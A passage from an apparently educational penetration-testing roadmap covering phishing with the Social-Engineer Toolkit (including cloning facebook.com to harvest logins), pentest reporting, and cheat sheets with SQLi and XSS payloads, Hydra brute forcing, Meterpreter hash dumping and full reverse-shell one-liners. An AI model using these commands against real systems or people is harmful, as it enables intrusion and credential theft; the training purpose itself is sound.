$ setoolkit

# Spear-Phishing Attack Vectors
1) Social-Engineering Attacks
  → 1) Spear-Phishing Attack Vectors
  → 1) Perform a Mass Email Attack

# Website Clone (Credential Harvesting)
1) Social-Engineering Attacks
  → 2) Website Attack Vectors
  → 3) Credential Harvester Attack Method
  → 2) Site Cloner
  → Enter URL to clone: http://facebook.com

# GoPhish — Professional Phishing Framework
$ ./gophish                               # Web UI: https://localhost:3333
🛡️ How to Protect Against Social Engineering
  • Don't click links in unknown emails
  • Never give your password over the phone
  • Always keep MFA enabled
  • Take security awareness training
  • Verify; don't just trust
CHAPTER 11
📝 Reporting & Documentation
Complete guide to writing a professional Penetration Testing Report

Pentest Report Structure

📋 Report Sections

  1. Executive Summary
  2. Scope & Methodology
  3. Findings Summary
  4. Detailed Findings
  5. Risk Rating
  6. Recommendations
  7. Appendix

What Each Finding Includes

  • Vulnerability name & CVE
  • CVSS Score & Risk Level
  • Affected System & URL
  • Description & Impact
  • Proof of Concept (PoC)
  • Screenshot & Evidence
  • Remediation Steps

Risk Rating Matrix

Risk Level | CVSS | Example | Remediation Time
CRITICAL | 9.0–10 | RCE, SQL Auth Bypass | Within 24 hours
HIGH | 7.0–8.9 | SQLi, Privilege Escalation | Within 7 days
MEDIUM | 4.0–6.9 | XSS, CSRF | Within 30 days
LOW | 0.1–3.9 | Information Disclosure | Within 90 days
INFO | 0.0 | Missing headers | At next maintenance

Reporting Tools

  • PlexTrac (Report Platform): professional pentest report platform
  • Dradis (Collaboration): team-based reporting & note sharing
  • Serpico (Open Source): open-source pentest reporting
CHAPTER 12
📋 Cheat Sheet — Complete Reference
All the important commands in one place, for quick reference

🗺️ Nmap Cheat Sheet

Scan Types
Command | Description
nmap -sS TARGET | SYN Stealth
nmap -sV TARGET | Version detect
nmap -A TARGET | Aggressive scan
nmap -p- TARGET | All 65535 ports
nmap -O TARGET | OS detection
nmap -sU TARGET | UDP scan

NSE Scripts
Option | Description
--script vuln | Vulnerability check
--script http-enum | Web enumeration
--script smb-vuln-* | SMB vulnerabilities
--script ftp-anon | Anonymous FTP
--script ssh-brute | SSH brute force
--script dns-zone-transfer | Zone transfer

🐉 Metasploit Cheat Sheet

MSF Console
Command | Description
search [keyword] | Search modules
use [module] | Load module
show options | View options
set RHOSTS [IP] | Set target
run / exploit | Run exploit
sessions -l | List sessions

Meterpreter
Command | Description
sysinfo | System info
getuid | Current user
getsystem | Privilege escalate
hashdump | Password hashes
shell | System shell
run post/multi/recon/... | Post module

🌐 Web Hacking Cheat Sheet

SQL Injection
Payload / Command | Description
' OR '1'='1'-- | Auth bypass
sqlmap -u "URL?id=1" | Auto SQLi
sqlmap -u URL --dbs | Database list
sqlmap -r req.txt | Request file
UNION SELECT 1,2,3-- | Column count

XSS Payloads
Payload / Command | Description
<script>alert(1)</script> | Basic XSS
<img src=x onerror=alert(1)> | Img tag XSS
<svg onload=alert(1)> | SVG XSS
document.cookie | Cookie steal
dalfox url http://target | Auto XSS scan

🔑 Password Cracking Cheat Sheet

Hashcat
Option | Meaning
hashcat -m 0 | MD5
hashcat -m 100 | SHA1
hashcat -m 1000 | NTLM
hashcat -m 1800 | sha512crypt
hashcat -a 0 | Dictionary
hashcat -a 3 ?l?l?l?l | Brute force

Hydra
Command / Option | Meaning
hydra -l USER -P list ssh://IP | SSH
hydra -l USER -P list ftp://IP | FTP
hydra -l USER -P list rdp://IP | RDP
hydra -L users -P list smb://IP | SMB
-t 4 | 4 threads
-f | Stop on first hit

🐚 Reverse Shell Cheat Sheet

# Listener
$ nc -lvnp 4444

## Reverse Shells ##
Bash:   bash -i >& /dev/tcp/IP/4444 0>&1
Python: python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
PHP:    php -r '$s=fsockopen("IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
NC:     nc -e /bin/sh IP 4444
Perl:   perl -e 'use Socket;$i="IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

## Upgrade Shell ##
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z → stty raw -echo; fg → export TERM=xterm

🔍 OSINT & Recon Cheat Sheet

DNS & Subdomain
Command | Description
amass enum -d domain | Subdomain enum
sublist3r -d domain | Subdomain list
dig domain ANY | DNS records
whois domain | Domain info
theHarvester -d domain -b all | Email harvest

Web Enumeration
Command | Description
gobuster dir -u URL -w list | Directory brute force
ffuf -w list -u URL/FUZZ | Fast fuzzing
nikto -h URL | Web vuln scan
whatweb URL | Tech detection
wafw00f URL | WAF detection

🏆 Practice Platforms

  • TryHackMe (BEGINNER FRIENDLY): guided learning paths, best for beginners. tryhackme.com
  • HackTheBox (INTERMEDIATE): real-world machines, CTF-style challenges. hackthebox.com
  • VulnHub (OFFLINE): download vulnerable VMs and practice locally. vulnhub.com
  • PortSwigger (WEB SECURITY): Web Security Academy, free labs. portswigger.net
  • PentesterLab (STRUCTURED): hands-on web app pentesting exercises
  • Bugcrowd / HackerOne (BUG BOUNTY): find bugs in real companies and earn rewards
"The quieter you become, the more you can hear."

This document is entirely for educational purposes. Always practice in an authorized environment and within legal boundaries.

v1.0 — Ethical Hacking & Penetration Testing Roadmap | Bilingual | 12 Chapters + Cheat Sheets